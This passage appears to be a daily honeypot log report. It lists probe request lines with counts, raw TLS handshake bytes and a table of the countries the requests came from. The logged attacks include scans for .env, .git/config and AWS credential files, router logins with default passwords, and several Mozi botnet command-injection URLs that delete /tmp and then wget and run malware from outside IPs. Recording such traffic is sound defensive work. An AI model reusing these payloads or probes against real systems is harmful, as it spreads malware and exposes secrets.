812GET /Media/Images/F81B47A3.PNG HTTP/1.1
822GET /Media/Images/54FA37E3.PNG HTTP/1.1
832POST /Autodiscover/Autodiscover.xml HTTP/1.1
842GET /Module1/js/Home_9b5766a815f5416da1d14b6622620932.js HTTP/1.1
852GET /.env.dev HTTP/1.1
862GET /xmldata?item=all HTTP/1.1
872GET /user_panel/.git/config HTTP/1.1
882GET /build/.env HTTP/1.1
892GET /login.cgi?username=telecomadmin&psd=telecomadmin HTTP/1.1
902GET /login.cgi?username=admin&psd=1234 HTTP/1.1
912GET /login.cgi?username=awnfibre&psd=fibre@dm!n HTTP/1.1
922GET /.env.uat HTTP/1.1
932GET /.env.default HTTP/1.1
942GET /login.cgi?username=admin&psd=admin HTTP/1.1
952GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
962\x03\x00\x00\x13\x0E\xE0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00
972GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1
982GET /.env.test HTTP/1.1
992GET /.env.production.local HTTP/1.1
1002GET /.env.live HTTP/1.1
1012GET /client/.git/config HTTP/1.1
1022GET /app/resources/.git/config HTTP/1.1
1032GET /.env.testing.local HTTP/1.1
1042GET /.env.local HTTP/1.1
1052GET /settings/.env HTTP/1.1
1062GET /js/mainControllers.js HTTP/1.1
1072GET /js/mainControllersUtils.js HTTP/1.1
1082GET /js/bootstrap.min.js HTTP/1.1
1092GET /js/moment.min.js HTTP/1.1
1102GET /.env.staging.local HTTP/1.1
1112GET /phpmyadmin/index.php HTTP/1.1
1122GET /1.php HTTP/1.1
1132GET /systembc/password.php HTTP/1.1
1142GET /files/.git/config HTTP/1.1
1152GET /src/.git/config HTTP/1.1
1162GET /www/.git/config HTTP/1.1
1172GET /project/.git/config HTTP/1.1
1182GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1192GET /.env.production HTTP/1.1
1202GET /data/.git/config HTTP/1.1
1212GET /prod/.env HTTP/1.1
1222GET /.env.sandbox HTTP/1.1
1232GET /config.json HTTP/1.1
1242GET /.env.template HTTP/1.1
1252GET /geoip/ HTTP/1.1
1262GET /password.php HTTP/1.1
1272GET /config/.env HTTP/1.1
1282GET /users/users/login HTTP/1.1
1292GET /t4 HTTP/1.1
1302GET /socket.io/socket.io.js HTTP/1.1
1312GET /js/jquery.min.js HTTP/1.1
1322GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1332GET /js/jquery.mask.min.js HTTP/1.1
1342GET /users/users/users/login HTTP/1.1
1352GET /users/login HTTP/1.1
1362GET /form.html HTTP/1.1
1372GET /robots.txt HTTP/1.1
1382GET /upl.php HTTP/1.1
1392GET /libs/js/iframe.js HTTP/1.0
1401GET /css/rcError.css HTTP/1.1
1411GET /css/elementsDesktop.css HTTP/1.1
1421GET /.env.init HTTP/1.1
1431GET /test/.git/config HTTP/1.1
1441\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xA1\xDE\x8C
1451GET /Fonts/VeraBd.woff HTTP/1.1
1461GET /sellers.json HTTP/1.1
1471GET /css/fonts.css HTTP/1.1
1481\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xB6z/\x03\xFDX\x80\xD4(\xD5\xE9\xF1\xA6\xE3\x9D\x1A\x00Xpd\xA6Bz\xA0Z\x7F\xC5b\xA6Nx8 \x93\xFB\x8B\x91>]\xEA
1491HEAD / HTTP/1.1
1501GET /css/bootstrap.min.css HTTP/1.1
1511GET /css/ui.jqgrid.min.css HTTP/1.1
1521GET /app-ads.txt HTTP/1.1
1531GET /css/jquery-ui.css HTTP/1.1
1541GET /css/style.css HTTP/1.1
1551GET /ads.txt HTTP/1.1
1561GET /v3/.git/config HTTP/1.1
1571GET /Fonts/Vera.woff HTTP/1.1
1581GET /socket.io/1/?t=1740035831699 HTTP/1.1
1591\x16\x03\x01\x00{\x01\x00\x00w\x03\x03s\xCD\xCC\x029\x8C\xDB\x9Dpp>\x88I\x04\x1E$\xDA\xB9E)\xDD*\xE4\xDBS\x5C\xD5vV\xE6\xC4L\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
1601\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x07\xB6\xDD\xF7\x91\x90>\xC8\x81w\x93w`\x17b\x81R\x06\xD3vy\xF5\x1A\x1Cb\xF7y\x229\x09\xFE\xAA\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
1611\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03o \x7F\x93n\xA8\xC5\xBF\xEBZT\xB4\x16\xD5\xB8\xB6\xE5\xDE\x8F\xC0a\x1F\xDAC\xB1M\x00d\xB8\x8C\xACU \x02L\x07\x15\xCAM)\x8D\xED\x983\xCDq\xA8
1621\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x0C\xBC\xED\xA0\xE4\xEEqQ{^,\xA0\xD1\xAC^\xE5\x0E\xED\xDF\xA6\xE6\xAB\xE6\x22\xE1\xAEs\xCD\xB3\xE4Y\xC9\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
1631\x00\xAB\x03$\x0F\xFF\xFFinfo
1641\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\xC2\x0B:6\x99\xBB\xEC\xF3\xBE\xC0\xD7%<\x94uH\xC82\xD2\xA4\xCA\x8D\xE9\x00N\xAFz]^f\x1C\xAC\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
1651\x08\x00\x86\x01
1661\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03D&\xB3\xDB\xB7,\xBC?*\xD3\xF2a\xDF\x1B\xB6\xE0\xC91\xE0&\x93[\xCF\xAE\x1B:\xB9\xBF
1671\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03u\xC0\xBF<\xCC\x10:\x8F\xE1`\x03z\xB3=T0\x95-]\xCB\xB1\xA7tA9ek\xDA\x8D\x9FY; \xE3g}R\x99\xB6\xDD\xB3\x98\xBF\x04\x87\xC51\xFE\xDEE\xC4\x9F\xB6fh\xDD>\x83\xCE\xFEa>\xAD\x9A\x82\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
1681\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03\xEEnn’-9a\x02/\x9E)\x84\x14\x14\x1A
1691\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x038L\x12\x80\x9A\xF9\x022\x22\xFF9)\x84?b\x12\xBD\x11!+mO\xE3>\x14?\x1D\x19c\xE6J\x93 7\x99\x22f\x03L\x92:\xC7\xC8\xF4~’\x00GAt1\xCF\xC1\xFF\xD2\x03\xE3v\x91\xD1.\x94\xE2\xA2\xD4\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
1701\x16\x03\x01\x00{\x01\x00\x00w\x03\x03z\x1E0\xEC\x00\x1E\xB81hL\x9A\x0Fp\xCBq\xAC\x8E\xDA\xD9f\x920\xA4\xEB
1711\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xEA%D\x22V\xF4\xE6*\x01P\x16\xDB\xAC
1721\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x08j\x98\xD3\xBB\xEE\xFAH\x82
1731\x16\x03\x01\x01\x17\x01\x00\x01\x13\x03\x03i \x7F\x18E\x808\xA3;\xF4\xF4\x10\xB8\xA6\xD9\x97\xF4\x11\x9B\xFC\x8C\xCE\xB15\xDD0r\xEE
1741GET /data/processing/.git/config HTTP/1.1
1751GET /env/.env HTTP/1.1
1761GET /dev/backup/.git/config HTTP/1.1
1771GET /data/private/.git/config HTTP/1.1
1781GET /.env.qa HTTP/1.1
1791GET /private/.env HTTP/1.1
1801GET /images/.git/config HTTP/1.1
1811GET /.envrc HTTP/1.1
1821GET /staging/.git/config HTTP/1.1
1831GET /build/.git/config HTTP/1.1
1841\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03C$hr\xA9\xAEt8\xED+\xA8\x90\x96>\xA4\x1EF<b\xF6\xFB\xC7\x88\xE2\xFC\xDDR-\xF15\x0Bt \xD3<\x14\xD6\xF2\xF68\xF1\xD5d+mQ\xA8\xD1o\xCD\xD1\xB4\x079.x\x88\x5C\xD3Dp9&8\x06\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
1851145.ll
1861GET /logs/current/.git/config HTTP/1.1
1871GET /geoip/geoip.inc HTTP/1.1
1881\x16\x03\x01\x00{\x01\x00\x00w\x03\x03x\xF0\x101\xD4 Dp\xDFD\xA2\x9F\x87\xAE\xE5aC\x14.\xD7\xA7\xF7I\xBC
1891\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xE0\x5C)\xF7\xF1\xE5\xDAp*[\xB9\xB8\x03\x08\xBD\xEA\xCC\x0B\xD01\x84\x00\xCC\x8D=\x84[\xA3t\x0012\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
1901\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xA9\xEF\x8C\xB5)Vi\xDC5\xDC-?-\xB0N\xC7E\xBD\x85nl\x7F\xA3\xFE\xD8\x18\xF2\x19\xF1\x05\xCAe\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
1911\x16\x03\x01\x00{\x01\x00\x00w\x03\x03W\x97A\xA7\x16k\xD9\x17\xB6\xD1\xDF\x8F\x11~EC\xBAX\xFF\xA8^ <\x8C\x95\x09\x960\x1A{\x07\xAC\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
1921\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03M\xA2\x13\x0BK\x055\xC8\x954\xE1\xB68rx\x04\x16\x12VC\x12\xED \x81A\xEB\x8C\xDC\x91\x18\xB0W\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
1931\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xDA1c\xAC>\xED\x92\xFF\x86\x83\xE6[\x0F\xB3\x12)h\xB2#\x9E\x5C\x87\xDC\xE8\x03\xD2\xE1\x19\x94\x06\xFEm \x90zH\xC9\xF9<\x82z\x81\xCAN\xFB\xB2\x10\xD3\xF9_\xA5\x8B\xA8\x85\x1D\xF5r-\xC2\xBCi\xD0x\x04\x93\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
1941GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1951\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xF7\x9D\x00\xEB;:\xC5\xB4\x95%\xAAip\xAF\xF1\xCE\xC0\xB7\xE6\x9B-)\xDB\xE8\xAF\xA84[\xF0\xF1i\xA6\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
1961GET /tools/.git/config HTTP/1.1
1971\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
1981GET /sitemap.xml HTTP/1.1
1991\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xFE\xA2\x1D\x17\xD0\xCC2Wjf\x98Fu\xE7\xC0\x1E}xu\xE7a
2001\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xE8P\xE86\xAB?RGM\xDF~\x93T\x1BJ8Ij\xA9\xEB\xA2\x8B\xE7$\x00\xB0\xFF\x96\xD6\x823\xB8\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2011\x16\x03\x01\x00{\x01\x00\x00w\x03\x03(\xA7\x1F\x13
2021\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03
2031GET /dashboard/.git/config HTTP/1.1
2041GET /static/content/.git/config HTTP/1.1
2051GET /deploy/.git/config HTTP/1.1
2061GET /app/frontend/.git/config HTTP/1.1
2071GET /scripts/.git/config HTTP/1.1
2081\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xC8\xF72%\xB3\x0F7\x80zyg\xF8\x13\xF9,\xEFKz\xED\xCA\x94\x1E^\x0CZ\xC8evoQ\x88\xED \x16\xC3\xF1]\x01\xE3\xCE\x8C?\xF7G\xB6Yvrg\xFF,\x9CI\x94jq\xE5\x17\xB7\x8D3bM\xC8\xBB\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
2091\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x87\x97\xE5F
2101\x16\x03\x01\x00{\x01\x00\x00w\x03\x03x\x12\x9EeW\xF5\x10s\xD0\xF6\x90\xB8\x0FB\xDC\x96\xE0O\xBDn\x0E\xA8,\xC2C\xF1X\xDB5j8\x97\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2111\x16\x03\x01\x00\xF2\x01\x00\x00\xEE\x03\x03Ck\xDF2;g\x11U\xD4\x8Fz\x87\x83\x5C\x89\xC4@\x13x\x95\xC0eL\x9D\x14\xEEd\xEF\xE4\x10\x99\xF1 Z\xE0’%4
2121\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03N\xF6\xE0b\xCE\xC9((\xE2\xD3\x1Ae\xC2\xEC^[\x14\x96\xA6\x02\xF6Np\x09
2131GET /users/users/users/favicon.ico HTTP/1.1
2141\x16\x03\x01\x00{\x01\x00\x00w\x03\x03I\xBB\x88\xEELc\xBE\xC3\xB1\xEB\xD7\x9B\x8CrI%\xAE\xDE\xBF(\x1BQ\xA1\x81\x87\xE9/,\xB4\xDD\x00L\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2151GET http://azenv.net/ HTTP/1.1
2161\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03CH\xA9sh\x9A\x00qK\x0B\x9Bnr%[\xBDvKX5\x91\xC9
2171\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xC6\x9E
2181\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03K\x8D\x90\xDB\xBA\xD6\x80\x09\xA7\x04q}Xa\xE7\xB8\xDA\xD4\xB7\xD3\xA1\xE2\xFEB7j\xEE\xCE\xE5\xBCP\x13 \x0Cqn\xCC\xDB\x1B\x1D`R\xA9\x89\x17\xD6\x1F’\x8F\x22yY\x90\xFF\x19=\x93>-\xC4\x9CRR:\xA1\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
2191\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\x9A\xC4\x89x*8Q\xFE
2201\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\x99D\x1B\xB5\x1A\xE2K\xD9\x9C\x87D\x99\x95\x886\xC7\xDF&\x99\x00\xF5Y\xA6\x89\x80>2\xCE\xF8\xB9*y \xA2q\x01\xB2\xCA\xDBf\x14k\xC2\xE89<\xCA\x85_<wP\xB0\xE9\xAF\xBD\xAB\xEDn\x0B:\xA7\xD2i\xA3\x00\x1A\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
2211\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03 \xAEr]\x09\x19\xA3\x09\xB6\xDE \x8B\x9F\x1D\xFB\xF7\x89?\xE1\xBE\xB7\x82C\xDCE\x1D=\xCD\xFEh- \xDA\xB9\xBC\x99\x92\xB4C^,\xAF\x11\xD81\xAC\x8C\xCA$@\xA4b\x82\x03\xE2%\xED\x02\x8A\xB1\x85r\xAB\x00V\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\x9F\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xAE\xC0\xAC\xC0$\xC0(\xC0#\xC0’\xC0
2221GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://221.15.186.233:58183/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
2231GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.230.66.27:10529/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2241\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xCC\xA8k\xBAW\x09\x07\xDE\x93\x82\x8B\xB6\x9AA\x02W*
2251GET /logs/temp/.git/config HTTP/1.1
2261GET /tmp/.env HTTP/1.1
2271GET /build_tool/.git/config HTTP/1.1
2281GET /infra/.git/config HTTP/1.1
2291GET /modules/db/.git/config HTTP/1.1
2301GET /scripts/dev/.git/config HTTP/1.1
2311t3 12.1.2
2321\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xAD\x18\x8FS\x16\x88\x16 e\xAB\x13\x88\x8F\xB3I\xEB\xC85@\x17\x8D7\xEA\x8B\x1D\xA3\xA6\xA6~}\xBF\x8F \x12\xCCi\xEE\xEA`.\x13K\x01\x94\xF1fmJ\x0C\xFD\x96\xDA\x8B\x1DY\x15-\x00\xDAT\xF1\x98\x9F\x96\x1D\x00V\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\x9F\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xAE\xC0\xAC\xC0$\xC0(\xC0#\xC0’\xC0
2331\x16\x03\x01\x00{\x01\x00\x00w\x03\x03)\xBF\x17\x7F
2341GET //wp-includes/termps.php HTTP/1.1
2351\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xEB\xA6\xA5\xEF\xE3\x03\x98K3E\xF0\xD6\xBD
2361\x16\x03\x01\x00{\x01\x00\x00w\x03\x03x/\xD0\x9FU 4\x7F\x14I\x5C\x0B\xC1\x949\xC4*pR\x18\xD8\x84\xA0
2371\x00\x0E\x08o\x22=\x06\xEAqV\x0B\x00\x00\x00\x00\x00
2381\x00\x0E8o\x22=\x06\xEAqV\x0B\x00\x00\x00\x00\x00
2391\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xDA\xBBl\x1AIAgD\xA0J\xAB\xCA\xAC\xDC\xE8\xA5\xD2\x1F\x04\xFB\x8546\x15\xEE\xE1\x044\xD5\xBB\x8C\xCC \x8B\xA5\x1E\xE5U\xC0\xDF\x85\xC2\xA8\xAC\x96n\xBB\x0B\xA4\xD7\xEES\x0F\x9Dh\x87\xA6\xA9\xD6I\xC2\xC2W\xEBM\x00V\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\x9F\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xAE\xC0\xAC\xC0$\xC0(\xC0#\xC0’\xC0
2401\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xAF\xED*m\x88\xAD\x1E\xE3\xE9s{\xD0\x87g\x82\xAC?\x8FJ\xD4\xBB\xF5\xD5s?Hy\xD8\xFCH\x80\xF6\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2411OPTIONS / RTSP/1.0
2421OPTIONS / HTTP/1.0
2431GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
2441\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x034\x06\xFA\xA4,\xD6\xA4%\x0E?\xF5\xCE#E\xDCv\x99\x184\x8692g\x003S\xBFJ\xB9G\xD9\x08\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
2451\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03v\xAE\x18\xCC\xECRe\xDE\x8B\x0F\x8C\x03\xDCr\xD6\xAD’\x92#k\xA3\xE3\xE4\x8FV9$!
2461\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\x9F\xC5_\xEB\xDBo\xD7\xC6\x9A\x17\xB5W\xC0\xD6X\xAD\xD5\xD1\x98X\x09x\xFB\x89S\xC3\x99\xF2*\x1C\xC2\x0E \x8C\x8ES\x85j\xF9\x9C\xAA,5m\xA1{\x90\xB2\xD5E\xB2S\x87\xA1\x071\x0B
2471GET //thoms.php HTTP/1.1
2481GET //inputs.php HTTP/1.1
2491GET //userfuns.php HTTP/1.1
2501GET //tempfuns.php HTTP/1.1
2511GET //termps.php HTTP/1.1
2521GET //wp-content/termps.php HTTP/1.1
2531GET //classfuns.php HTTP/1.1
2541GET /lib/js/.git/config HTTP/1.1
2551GET /lib/python/.git/config HTTP/1.1
2561\x16\x03\x01\x00{\x01\x00\x00w\x03\x03nO\xBF2\xEA\x00\xFBm\x85^\xF8\x85H{\xA9\xF6\xD57Y\xC4\x98NLCM\xB8\xD6\xCE\xBC\x03\x9DH\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2571GET /shell?cd+/tmp;rm+-rf+*;wget+http://121.231.99.27:57203/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2581GET /.env.preprod HTTP/1.1
2591GET /.aws/credentials HTTP/1.1
2601GET /docker-compose.prod.yml HTTP/1.1
2611GET /.env.bak HTTP/1.1
2621GET /.env.config HTTP/1.1
2631GET /.env.prod HTTP/1.1
2641GET /config/.git/config HTTP/1.1
2651GET /.env.ci HTTP/1.1
2661GET /cms/.git/config HTTP/1.1
2671\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x982b=\x14F<\xC0\xF7\xB4\xC2\xF1\x8F\xFA\x16R\x91*\x14\xEF\xD1\x15\xAE{Ng\xDB=&5\xCC`\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2681\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xDA\x84\xA5I\xDACiEO\xE3\x09\x92\x04\x95\x7F\xF4\xE3\x11\xD8\xFD\xD8>\x8B(\xA8\xA9q\x22\xF7\x8Dv3\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2691\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xCF\xA9 \x82\xCD\xAAQ\x1F\x7F\x04\xED\x0C \x00\xAD\xED\x1BdF\x8E@C\xAF\x8Ek\xD1\xF70\x8C\x01\xCD\xE3\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2701GET /api.json HTTP/1.1
2711\x16\x03\x01\x01\x17\x01\x00\x01\x13\x03\x03\xE0\x16~L\xCE!\xF2R\xC7\x04\x1E\x00\xE4\x12Ms^I\x10\x02\x1A\xA3\xA6\xC4%\xA9:9’k\xF2\xCF \xB0\xB8w\xA2\xC8\xBC\xEB5%H)\xDCc6W\xF4p\xF6\xE7y\x8D\x98\xCB\xEA\x8E#\x91\xAD\xB5\xF0\xCBj\x004\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x09\x00\x9E\xCC\xA8\xCC\xAA\x003\x00=\x00\x16\xC0
2721\x04\x01\x01\xBBh\x156[\x00
2731\x05\x01\x00
2741CONNECT ifconfig.co:443 HTTP/1.1
2751\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\x91\x9B\xAEB\xFCqx#\xB6VBN\xF1\x10\xF8\x5C)\x9E\x9A\xEBo\xBB\xB2\xA9S\xB5h]\x19b\xAF\xBE \x7F\xF1\xD1\x89\x90\xD8\xCB\xEDa~\x01Pa\xED\xD3\x91\x8E\xAAOB\x08\xF3\xDE\xC9\x0B\xA9T?\xA2r\x96\x93\x00\x1A\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
2761GET /Public/home/js/check.js HTTP/1.1
2771GET /.env_sample HTTP/1.1
2781GET /backup/.git/config HTTP/1.1
2791GET /app/.git/config HTTP/1.1
2801GET /api/.env HTTP/1.1
2811GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://27.215.84.91:51040/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
2821GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://39.87.13.136:59404/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
2831\x16\x03\x01\x00{\x01\x00\x00w\x03\x03hh:\x85\xB7\x06!cz\xBE)FY\xFAr\xE2N%\xEB\xFF\x02\xF2\x03\xEE\x8E\xEA(\x89\xD5\xDAb\x8C\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
2841\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03aw\xC3!\x84G\x17\xFA\xA5\xE2\xC0\x01F\xC0\x10\x8Cr\x8FLLc\x06\xEFAyH\xB3\xF9V\x98A( \x0E\xAFvgs\xB5\xCF\xDASR\xA15\x80\x225\x05\x9FZ\xB4@+3 t\xA9*\xCD\xB8a/’/\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
2851\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x16 i \xDC\x07W\x90S\x08R
2861\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xCF\xCB\x19\xBE\xEA\xEA
2871GET /media../.git/config HTTP/1.1
2881GET /.env.save HTTP/1.1
2891GET /dev/.git/config HTTP/1.1
2901GET /.env.testing HTTP/1.1
2911GET /.env.dev.local HTTP/1.1
2921GET /server/.git/config HTTP/1.1
2931GET /media/.git/config HTTP/1.1
2941GET /assets../.git/config HTTP/1.1
2951GET /static../.git/config HTTP/1.1
2961GET /.env.development.local HTTP/1.1
2971GET /.env.dist HTTP/1.1
2981GET /admin/.git/config HTTP/1.1
2991GET /.well-known/security.txt HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0262NL
1202US
2154HK
3121GB
477CN
564PL
659CH
748VN
835DE
919TW
1017BG
1115RU
1211IN
1310SC
148PT
158FR
166NG
175TR
185AO
194BR
204GH
213HU
223CA
233IT
243BE
253SG
263UA
273ZA
282LU
292MD
302JP
312ID
322CZ
332IR
341AR
351CG
361TH
371LV

Related

Report: 2025-02-19
·5908 words
Repport Daily
Report: 2025-02-18
·6211 words
Repport Daily
Report: 2025-02-17
·10207 words
Repport Daily